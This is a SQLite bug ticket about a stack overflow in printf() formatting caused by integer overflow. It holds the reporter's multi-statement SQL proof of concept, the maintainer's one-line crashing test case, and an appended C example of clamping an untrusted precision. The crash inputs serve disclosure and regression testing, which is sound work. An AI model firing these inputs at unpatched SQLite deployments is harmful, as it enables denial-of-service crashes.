SQLite

Ticket Hash: 23439ea5822411389c8edac234c08f2cc27ef3e9
Title: Stack overflow in sqlite3_str_vappendf, caused by int overflow
Status: Fixed Type: Code_Defect
Severity: Important Priority: Low
Subsystem: Utilities Resolution: Fixed
Last Modified: 2020-05-23 20:03:59
Version Found In:
User Comments:
yongheng added on 2020-05-23 17:52:02:
Affects the latest release version.

POC:
---
CREATE TABLE a(b DOUBLE CHECK( NOT CASE WHEN printf(b, b) THEN 0 END) UNIQUE ON CONFLICT REPLACE);
CREATE TRIGGER c INSERT ON a BEGIN INSERT INTO a SELECT group_concat(b, 2147483647) FROM a;END;
INSERT INTO a(b, b, b) VALUES(NULL, 9, 3);
UPDATE a SET b = 0;
INSERT INTO a VALUES('GERMANY''s%'), ('Y'), ('Brand#23');
---

drh added on 2020-05-23 20:03:59: (text/x-fossil-wiki)
Simplified test case:

<blockquote><verbatim>
SELECT printf('%.*g',2147483647,0.01);
</verbatim></blockquote>

Affects all versions of SQLite since printf() was introduced in
version 3.8.3 (2014-02-03).
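A defensive rendering of the simplified `%.*g` case, added here as an illustration and not SQLite's code or the fix for this ticket: the untrusted `.*` precision (2147483647 in the test case above) is clamped before it enters any size arithmetic, and the bounded write is checked rather than assumed to fit. The precision limit, buffer size and function names are this example's own assumptions.

```c
#include <limits.h>
#include <stdio.h>
#include <string.h>

/* Bounds chosen for this example, not SQLite's own constants. A double's exact
 * decimal expansion never needs more than 1074 fractional digits, so a larger
 * precision can only append zeros: clamp there instead of trusting the value. */
#define FLOAT_PRECISION_LIMIT 1074
/* sign + up to 309 integer digits + '.' + clamped precision + "e-324" + NUL */
#define FLOAT_BUF_SIZE (1 + 309 + 1 + FLOAT_PRECISION_LIMIT + 5 + 1)

/* Sanitise a precision that arrived through a "%.*g" argument. The int may be
 * anything, including 2147483647 as in the ticket's test case; adding such a
 * value to a width or buffer offset is where an int overflow begins.
 * Negative means "use the default", as in C's printf. */
int clamp_precision(int requested) {
    if (requested < 0) return 6;
    if (requested > FLOAT_PRECISION_LIMIT) return FLOAT_PRECISION_LIMIT;
    return requested;
}

/* Render value with "%.*g" into buf[len]. Returns the length written, or -1
 * when the result would not fit. The clamp bounds the output, snprintf bounds
 * the write, and the return value is checked instead of assumed. */
int format_g(char *buf, size_t len, int requested_precision, double value) {
    int n = snprintf(buf, len, "%.*g", clamp_precision(requested_precision), value);
    if (n < 0 || (size_t)n >= len) {
        if (len > 0) buf[0] = '\0';   /* truncated: never hand back a partial number */
        return -1;
    }
    return n;
}

/* Wrapper using a buffer of the size the clamp guarantees is sufficient. */
const char *format_g_static(int requested_precision, double value) {
    static char buf[FLOAT_BUF_SIZE];
    return format_g(buf, sizeof buf, requested_precision, value) < 0 ? NULL : buf;
}

int main(void) {
    /* The ticket's simplified test case: huge precision, small value. */
    printf("%s\n", format_g_static(INT_MAX, 0.01));
    return 0;
}
```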